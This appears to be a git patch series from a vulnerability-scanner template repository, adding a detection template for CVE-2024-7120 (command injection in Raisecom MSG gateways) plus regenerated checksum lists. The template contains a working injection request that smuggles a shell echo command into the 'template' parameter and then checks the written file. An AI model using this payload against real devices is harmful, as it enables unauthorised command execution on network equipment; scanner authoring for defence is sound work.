- https://vuldb.com/?ctiid.272451 + - https://vuldb.com/?id.272451 + - https://vuldb.com/?submit.380167 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L + cvss-score: 6.3 + cve-id: CVE-2024-7120 + cwe-id: CWE-78 + epss-score: 0.00046 + epss-percentile: 0.16951 + metadata: + verified: true + max-request: 2 + fofa-query: '"Web user login" && ""' + tags: cve,cve2024,intrusive,raisecom + +http: + - raw: + - | + GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo%20-e%20%27{{randstr}}%27%3E%20%2Fwww%2Ftmp%2Finfo.html%60 HTTP/1.1 + Host: {{Hostname}} + - | + GET /tmp/info.html HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + part: body_2 + words: + - "{{randstr}}" + + - type: status + status: + - 200 From 5de730582001524e7c493d27792f3d7903cab14c Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 1 Aug 2024 10:29:14 +0530 Subject: [PATCH 07/46] Update CVE-2024-7120.yaml --- http/cves/2024/CVE-2024-7120.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-7120.yaml b/http/cves/2024/CVE-2024-7120.yaml index ea2ab55e57..0efea20d9f 100644 --- a/http/cves/2024/CVE-2024-7120.yaml +++ b/http/cves/2024/CVE-2024-7120.yaml @@ -3,7 +3,7 @@ id: CVE-2024-7120 info: name: Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90 - command Injection author: pussycat0x - severity: critical + severity: medium description: | A vulnerability, which was classified as critical, was found in Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90. This affects an unknown part of the file list_base_config.php of the component Web Interface. The manipulation of the argument template leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272451. reference: @@ -33,11 +33,12 @@ http: GET /tmp/info.html HTTP/1.1 Host: {{Hostname}} + matchers-condition: and matchers: - type: word part: body_2 words: - - "{{randstr}}" + - "{{randstr}}" - type: status status: From 653d00e894d2840391aeb71443adff18944a066e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 1 Aug 2024 11:02:49 +0530 Subject: [PATCH 08/46] Update CVE-2024-7120.yaml --- http/cves/2024/CVE-2024-7120.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-7120.yaml b/http/cves/2024/CVE-2024-7120.yaml index 0efea20d9f..c874785be6 100644 --- a/http/cves/2024/CVE-2024-7120.yaml +++ b/http/cves/2024/CVE-2024-7120.yaml @@ -1,7 +1,7 @@ id: CVE-2024-7120 info: - name: Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90 - command Injection + name: Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90 - Command Injection author: pussycat0x severity: medium description: | @@ -22,7 +22,7 @@ info: verified: true max-request: 2 fofa-query: '"Web user login" && ""' - tags: cve,cve2024,intrusive,raisecom + tags: cve,cve2024,intrusive,raisecom,rce http: - raw: From b6dfbfded75658379968fed3a29d818ccfa6336f Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 1 Aug 2024 05:35:42 +0000 Subject: [PATCH 09/46] Auto Generated New Template Addition List [Thu Aug 1 05:35:42 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6e6d1b9901..19ef0d4019 100644 --- a/.new-additions +++ b/.new-additions @@ -6,6 +6,7 @@ http/cves/2024/CVE-2024-6205.yaml http/cves/2024/CVE-2024-6366.yaml http/cves/2024/CVE-2024-6396.yaml http/cves/2024/CVE-2024-6922.yaml +http/cves/2024/CVE-2024-7120.yaml http/cves/2024/CVE-2024-7188.yaml http/misconfiguration/deployment-interface-exposed.yaml http/misconfiguration/installer/quickcms-installer.yaml From 708c3f334c06f3fd82572ecc158b0c04e785cad3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 05:35:50 +0000 Subject: [PATCH 10/46] Auto Generated Templates Checksum [Thu Aug 1 05:35:50 UTC 2024] :robot: --- templates-checksum.txt | 423 +++++++++++++++++++++-------------------- 1 file changed, 212 insertions(+), 211 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 96f9bab7e0..c8afd6eb21 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -224,8 +224,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:9b83853729452d4602f4bdf051c16277623d816d -cves.json-checksum.txt:6f3e34ff4b28e06515f1f1d0572a6ea0c096e2d0 +cves.json:0f4eb7cbebfc4ff9da2bf1c30de44f37646a82f1 +cves.json-checksum.txt:78d171988a3d739a36543b840766a6feef335ab3 dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -756,7 +756,7 @@ helpers/wordpress/plugins/black-studio-tinymce-widget.txt:c3c414dd549c09cb265d8c helpers/wordpress/plugins/breadcrumb-navxt.txt:2993934f31a10ddda5a7fb5e979600aa8bc7d69d helpers/wordpress/plugins/breeze.txt:4817cb4528a6e4857fb571db95197ba2033c4fc1 helpers/wordpress/plugins/broken-link-checker.txt:dabb01b74fbe3c51012121a2802b2694c9968fc7 -helpers/wordpress/plugins/chaty.txt:237c8767860dc44f0f30057d25e9143e3d0b425f +helpers/wordpress/plugins/chaty.txt:e533118608a55d6ab1d3699c600fc5c59213df36 helpers/wordpress/plugins/child-theme-configurator.txt:fbd969c78e9a6d04b7b8fc3a74ee2ee96b5fb3d8 helpers/wordpress/plugins/classic-editor.txt:a3240fca0b8eb2f46dc3168aa05f2447def6cb09 helpers/wordpress/plugins/classic-widgets.txt:98250286db92ccc336dc6f622c10c8bc09286693 @@ -772,7 +772,7 @@ helpers/wordpress/plugins/contact-form-7.txt:df805429f6823d1d7321bcb6d64c21695e3 helpers/wordpress/plugins/contact-form-cfdb7.txt:87d8ffba80ba87401ae94d97363f39c9ca8aa639 helpers/wordpress/plugins/cookie-law-info.txt:f94488dae421ac2a8aae98632f63a2647ef07e43 helpers/wordpress/plugins/cookie-notice.txt:5b3fa59c8d983303bb4380265de5153b897ee87d -helpers/wordpress/plugins/copy-delete-posts.txt:c3000a6db3b2781a189fbfaa91a73e6d63d567c9 +helpers/wordpress/plugins/copy-delete-posts.txt:403b52175033f5fc6cef0024c84c6d302aaf8633 helpers/wordpress/plugins/creame-whatsapp-me.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/creative-mail-by-constant-contact.txt:8a49e162e780f4c3a1d7e6f60cbfde4d5158004e helpers/wordpress/plugins/custom-css-js.txt:4ef690b935393e44a136931421e45fe50451b469 @@ -808,11 +808,11 @@ helpers/wordpress/plugins/ga-google-analytics.txt:a0dab5f80a9088edfc02fe1a85d2d8 helpers/wordpress/plugins/gdpr-cookie-compliance.txt:cf32739ccdf9900e27611336c93027a7d59f0e18 helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:0ff943418641a5443653f90ce6951a93e9770070 helpers/wordpress/plugins/google-analytics-for-wordpress.txt:d221ed6fdf5eb7524565cb7b691ea3effdcfb637 -helpers/wordpress/plugins/google-listings-and-ads.txt:67c391fdae5d34abde64a1732ca064007569702b +helpers/wordpress/plugins/google-listings-and-ads.txt:0aaa3cea7451675ff270540e13308210d8fce9ab helpers/wordpress/plugins/google-site-kit.txt:a482deab175f9503a82b6e39521df665b32e2d13 helpers/wordpress/plugins/google-sitemap-generator.txt:8219d4ef07eba68c05cb812b66a743661925aa25 helpers/wordpress/plugins/gtranslate.txt:16b08d6d2a65aa308add14852e0faea08001ef60 -helpers/wordpress/plugins/gutenberg.txt:c0b7132c131b0bc84961d92e38abb3eb41c6eb80 +helpers/wordpress/plugins/gutenberg.txt:552592201af458f4bc702e84c959556cd0cdf43d helpers/wordpress/plugins/happy-elementor-addons.txt:e8acad09c835eb3f06d4dfd19f6a58e6bdb0b839 helpers/wordpress/plugins/header-and-footer-scripts.txt:bf64dd8c92190417a38d834b0c92eee4be757761 helpers/wordpress/plugins/header-footer-code-manager.txt:42c9dca141f2cd50ab7fcfa673255d29eac1fe9d @@ -821,7 +821,7 @@ helpers/wordpress/plugins/header-footer.txt:e533118608a55d6ab1d3699c600fc5c59213 helpers/wordpress/plugins/health-check.txt:348b6913760dfd78a9394bc38c5a8fa7528208e2 helpers/wordpress/plugins/hello-dolly.txt:534467bb06aa6d8cb7e27ce2f48b87742c795cad helpers/wordpress/plugins/host-webfonts-local.txt:c11b7a364d5e6db1fe941eda928f4233e84271c9 -helpers/wordpress/plugins/hostinger.txt:9d58b49dc32ab6a8591bb2ce2c9a3a4748e7f41d +helpers/wordpress/plugins/hostinger.txt:16b08d6d2a65aa308add14852e0faea08001ef60 helpers/wordpress/plugins/image-optimization.txt:29cd3f50fdf56b43132cb011be27e5a2567b76ae helpers/wordpress/plugins/imagify.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0 helpers/wordpress/plugins/imsanity.txt:6b6e01beb45fb7f89787efd83e89589ecafc6104 @@ -865,7 +865,7 @@ helpers/wordpress/plugins/pdf-embedder.txt:7c48bf349bc02741cd6e5bf188ef8ecd52f2a helpers/wordpress/plugins/photo-gallery.txt:118daf97168a9a15434efdbbaa6d2dbe5614eec6 helpers/wordpress/plugins/php-compatibility-checker.txt:c117423da3e5e169d36e3111880b709d28e85308 helpers/wordpress/plugins/pinterest-for-woocommerce.txt:b43a7e746239a620873eb1cafebc00275628d25d -helpers/wordpress/plugins/pixelyoursite.txt:eed99d45d85b51d535a8ee871f49622ae2ab39c6 +helpers/wordpress/plugins/pixelyoursite.txt:ba095c409b6a9a6a4fe8458eee2a6da2b66056d4 helpers/wordpress/plugins/polylang.txt:ded24367ba96a591530ae7476faefb646d5c84a2 helpers/wordpress/plugins/popup-builder.txt:8b367cc24dc19d310f9af1157021067beef77465 helpers/wordpress/plugins/popup-maker.txt:c25ed33c251bfc15583cad11462f17a56e46989d @@ -922,7 +922,7 @@ helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930c helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3 helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:33e208e824cddc9444184f3b33cdfe7045499ff7 helpers/wordpress/plugins/woocommerce-legacy-rest-api.txt:6288dca36116a23967560d315aa079e9c4f5da8c -helpers/wordpress/plugins/woocommerce-payments.txt:14665694dff2d37ef9323cf70015fe0466bea9b2 +helpers/wordpress/plugins/woocommerce-payments.txt:3284e1bfed2e6fe80a1da5dd0ea07afa904b0f37 helpers/wordpress/plugins/woocommerce-paypal-payments.txt:8833d6b9ff65739ec437d2754b9fc885e202a555 helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:b551dceb18411def5ed66556a7d0855f82ba865f helpers/wordpress/plugins/woocommerce-services.txt:d5191657a84fc8d54327e42ccdc17707f97bfa90 @@ -947,7 +947,7 @@ helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt:4fde6b87a266eece4b77e helpers/wordpress/plugins/wp-rollback.txt:9900ba1358421f36ec71073f65f6a41eed98f7c2 helpers/wordpress/plugins/wp-seopress.txt:3284e1bfed2e6fe80a1da5dd0ea07afa904b0f37 helpers/wordpress/plugins/wp-sitemap-page.txt:b600bf3dacb5d620338f6412a343d3349ec570bf -helpers/wordpress/plugins/wp-smushit.txt:c7f53e91bcbfae4c21042e9d0833d24ed2cfc08c +helpers/wordpress/plugins/wp-smushit.txt:424257104153917e8e6f388584332d0e039aacfa helpers/wordpress/plugins/wp-statistics.txt:50a1dda2c7175fa98585515877bea64429587cc8 helpers/wordpress/plugins/wp-super-cache.txt:4cf4800c61a8883b820676f651c058621e0c1b88 helpers/wordpress/plugins/wp-user-avatar.txt:a7bfba4c08f393aabc53a4392dbd6b3d0f13baaa @@ -3538,6 +3538,7 @@ http/cves/2024/CVE-2024-6587.yaml:3b9b74b62b5fee24b9ae9e2138affc55ffabe1d3 http/cves/2024/CVE-2024-6646.yaml:2e73ea26a9329272c114fbee69cc648183fda206 http/cves/2024/CVE-2024-6746.yaml:d4ab2b4730c55e4aa424d56e07cd03f9b2c26859 http/cves/2024/CVE-2024-6922.yaml:83b019597ae43258e9b9b0786304ed398ce3fe14 +http/cves/2024/CVE-2024-7120.yaml:7ce8a36714ff6ef0316679cc10c73edd07e50572 http/cves/2024/CVE-2024-7188.yaml:5edd2259c08b9141388e13eb5fba2281baa93044 http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce @@ -7342,230 +7343,230 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:8316097b4f2c4ad748ce6b585a5a118a05aa8f67 -http/technologies/wordpress/plugins/add-to-any.yaml:ecd986a7f80f21c3146b823e20ba815097081fe1 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:04d3f957cd11fd6f59b50d8d006ae645e6f41469 +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:0d22c21a259e09a2d976671facc91aff67b64908 -http/technologies/wordpress/plugins/akismet.yaml:8ab3c1c3713da78df9505399e37cd61e8f87fb4b +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:9f4faa8e62a7bd8e62e772a9bb5fb81d792f237f -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:b7bbbdc6b18dab259342e7ce0bc6b0d7199d8ee4 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:53e996974306507ea538a3c3022c94c0e12bdfb5 -http/technologies/wordpress/plugins/amp.yaml:860722a7f7f18b4c4f24ea4e813c4f4bab67817d -http/technologies/wordpress/plugins/antispam-bee.yaml:f97fba5c4768e71706cb96e8c446c8586c3d1781 -http/technologies/wordpress/plugins/astra-sites.yaml:b646d3ea341be9d4705da75684a52b75f16cd26b +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7249d00247d23107454177596c97f03baab19938 -http/technologies/wordpress/plugins/backwpup.yaml:940e6656953dd0f22c9a01a6c3cbb5127028faa6 -http/technologies/wordpress/plugins/better-search-replace.yaml:e9f1c2d9a277ba0806a365dc2bb1315824fe3b20 -http/technologies/wordpress/plugins/better-wp-security.yaml:eec440f8c88e6e3a0c8d1a5d0cb4b77f7cd023e9 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:ce786996ca7edfdf766f37cefafcf0157825a97a -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:16498aa789c204a3b8995e81c4465d1aa498684a -http/technologies/wordpress/plugins/breeze.yaml:35e757aea8b524f5b90612efbfc1ab9717b4a090 -http/technologies/wordpress/plugins/broken-link-checker.yaml:2ba0b775150f199d1935b1d363643718fc8619f7 -http/technologies/wordpress/plugins/chaty.yaml:4a4b3b6075cd2a31db1863f5ea358e5da102c119 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:9148cf0c551841b97d2ade339448994474788562 -http/technologies/wordpress/plugins/classic-editor.yaml:bf033d3416148abb761cd0edc779c58587372113 -http/technologies/wordpress/plugins/classic-widgets.yaml:484f9f877009cc53d487946ba744e223991b7a67 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:86aefbaba8b6c23297f371cd79b3279ffb44411c +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba +http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:f427d7e1b9da5eaa7d7776d5b47f3f3403ca79c3 -http/technologies/wordpress/plugins/coblocks.yaml:9772d77420d1eff358b0fe6a096041ca856505c4 -http/technologies/wordpress/plugins/code-snippets.yaml:9c8d2e43e9fc325968d4565201a856e942d5623d -http/technologies/wordpress/plugins/coming-soon.yaml:878bc6d89699975d312a1e26ebed2097b4bc177c -http/technologies/wordpress/plugins/complianz-gdpr.yaml:316e5e5f78349c4077ed14c6a9aae76befffd603 -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f231559505a30a8295e5219c837cbf265776f6a8 -http/technologies/wordpress/plugins/contact-form-7.yaml:bf1f86ebc87cfcc73711f66a246fad4bab7e68cd -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:591c60914ad3262fbb0c5ff95f72472656bb0a1e -http/technologies/wordpress/plugins/cookie-law-info.yaml:d5e58be4211e929ae6ade89c60125834499ae1da -http/technologies/wordpress/plugins/cookie-notice.yaml:3775b0224e6134b4086810c4873f2daabd3912d0 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:8c68aac83dd8ef7544473b2dc1a9087d1ec155b3 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:42701d2c787debb299c6c2a96089850ed9f2bb93 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:84d6a0c83125aafcfeefe591682ce11e0780e5fe -http/technologies/wordpress/plugins/custom-css-js.yaml:c3c941d9236d852ceedcc816b0a8f19052653839 -http/technologies/wordpress/plugins/custom-fonts.yaml:eafe83d46b7bcaec62f6911de3ccbad1ce1726e4 -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:dfbfc84308c425df0d7bcd898363f88cfae279a5 -http/technologies/wordpress/plugins/disable-comments.yaml:3a5b062c1cdef7eae87c42c6ff0430078f007dd5 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:e4c6a2b6d55f64047b4df63b081ac4f04b8a72e4 -http/technologies/wordpress/plugins/duplicate-page.yaml:bff0972623278d37c934a11909654ccf9c9a1698 -http/technologies/wordpress/plugins/duplicate-post.yaml:e238ff8d570e480dbded3eb80c523f273de53151 -http/technologies/wordpress/plugins/duplicator.yaml:1933539842649362bf47318ce69a593412ba558c -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:7d9e97cfe5461d221876c6c8aa7287666bdb4fc2 +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 +http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:2f4191d85def3372a337d94ae5861a8115cb23bc -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:b3d19da6b40dbc6cce091855147759494cd00b28 -http/technologies/wordpress/plugins/elementor.yaml:05a9bdcb3407095e85d4b1ad9d608837923a5bf6 -http/technologies/wordpress/plugins/elementskit-lite.yaml:7abbbef94bfbbe2b0adffe962c07d74fd0269958 -http/technologies/wordpress/plugins/enable-media-replace.yaml:2a606900ac2d7a3b05734922c725faddf038e502 -http/technologies/wordpress/plugins/envato-elements.yaml:2ef60bfb54c15bc7e95a90ae63daee615655c705 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:8b7fc9117973aac607546ef0330cf2948936251d -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:46d992667493f32a2be8406e24a1686127da0e52 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:72dd39f9e7321fa95f797e99d8d454f94a808e12 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:2e416e815ae52d031e891dfeb688b74df3301d2f -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:1eb3cc20b7b96d2259296e3243fa79724c59afff -http/technologies/wordpress/plugins/flamingo.yaml:42423fd02ba8b4cab2d7d6229ac3360d8469c104 -http/technologies/wordpress/plugins/fluent-smtp.yaml:ad1efca62f442299f5c057b98a64be2210c6c6a9 -http/technologies/wordpress/plugins/fluentform.yaml:ad1ee30f2ef32c57f933b10614b300e8f1e841d7 -http/technologies/wordpress/plugins/font-awesome.yaml:b53b527d87dd1fe08dcf413e797feec5e0c1fbc5 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:58bc95338550da669150ae6f25d77d0dceb61f20 -http/technologies/wordpress/plugins/formidable.yaml:8a5421f42996bfa2d2cb0698411ab6759c725a8b -http/technologies/wordpress/plugins/forminator.yaml:e246f18f4d33b52c50562beed5cf0f8ca7e4cb02 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:ede122b1bd450af9b34e9bff287df5a46b736ac5 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:54cb054b07dda468c52fdec71396e4ff4f1b0287 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:526cdbb05d11ca5a931a0ebf9c93b8d081b97638 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:18604a5039ce963583ee21b3f93716f53e6c2c3a -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:25b1a3fb80b2880a067b64303fb288be3bb4f346 -http/technologies/wordpress/plugins/google-site-kit.yaml:a65a4084476190cfc2ea0598f9c677c6125f1c18 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:87346d861ec627c2a55cfe48f3e5f2341df96011 -http/technologies/wordpress/plugins/gtranslate.yaml:ed3bab52fa5501b74a6d9dbaf12d852b21f2bafc -http/technologies/wordpress/plugins/gutenberg.yaml:7f4ad7ab2e78f4f00ba136c993e1d2d96016451f -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:6d6a3b38be394b70e4d506f25e4eab6603ad4529 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 +http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 +http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d +http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc +http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 +http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 +http/technologies/wordpress/plugins/fluent-smtp.yaml:f8756f30bfdc614abb6aa0cef6f395e5a96615d8 +http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 +http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e +http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 +http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 